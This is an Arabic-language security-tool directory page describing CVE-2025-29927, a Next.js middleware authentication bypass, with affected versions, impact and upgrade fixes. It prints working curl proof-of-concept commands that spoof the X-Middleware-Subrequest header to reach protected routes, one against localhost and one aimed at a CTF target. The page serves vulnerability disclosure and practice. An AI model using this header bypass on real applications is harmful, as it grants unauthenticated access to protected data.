Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-29927 | Kitploit
أدوات/GitHubGitHub/toddkk02/cve-2025-29927
المصادقة والترخيصتحليل الثغرات الأمنيةالتهرب من IDS/IPSاستغلال تطبيقات الويبCTFاختبار الاختراق
GitHubtoddkk02/cve-2025-29927

CVE-2025-29927

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-29927 — تجاوز مصادقة الوسيطة في Next.js

نظرة عامة

تخيل حارسًا أمام النادي، لكن إذا قلت له "أنا بالداخل بالفعل"، يسمح لك بالمرور دون فحص. هذا بالضبط ما تمثله CVE-2025-29927.

يعمل الوسيط (Middleware) في Next.js قبل معالجة الطلب، مما يجعله المكان المثالي للتعامل مع المصادقة. تستخدم Next.js ترويسة داخلية باسم x-middleware-subrequest لمنع الطلبات المتكررة وتجنب الحلقات اللانهائية. توضح هذه الثغرة أنه من الممكن تجاوز أو تخطي تنفيذ الوسيطة بالكامل — بما في ذلك فحوصات الأمان الحرجة مثل المصادقة قبل الوصول إلى مسار محمي.


الإصدارات المتأثرة

الفرعالإصلاح في
15.x< 15.2.3
14.x< 14.2.25
13.x< 13.5.9

التطبيقات المعرضة للخطر

  • التطبيقات التي تستضيف Next.js وتستخدم الوسيطة
  • التطبيقات التي تعتمد على الوسيطة للمصادقة وفحوصات الأمان دون التحقق لاحقًا في حزمة التطبيق

غير المتأثرة

  • التطبيقات المستضافة على Vercel
  • التطبيقات المستضافة على Netlify
  • التطبيقات المنشورة كـ تصديرات ثابتة (لا يتم تنفيذ الوسيطة)

الأثر

تعمل آلاف أو ملايين التطبيقات على إصدارات Next.js غير مصححة. إذا لم تتم معالجتها، تسمح هذه الثغرة بالوصول غير المصادق إلى المسارات المحمية من قبل أي شخص — دون الحاجة إلى بيانات اعتماد.


إثبات المفهوم

root@kitploit:~
curl -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3000/private-area

يعيد الاستجابة إرجاع الصفحة المحمية دون أي مصادقة.

استغلال الثغرة على بيئة CTF حقيقية

root@kitploit:~
curl -s "http://<target>/<private-area>" \
  -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware"

الإصلاح

قم بترقية Next.js إلى إصدار مصحح:

  • 15.x → 15.2.3 أو أحدث
  • 14.x → 14.2.25 أو أحدث
  • 13.x → 13.5.9 أو أحدث
تنزيل الأداة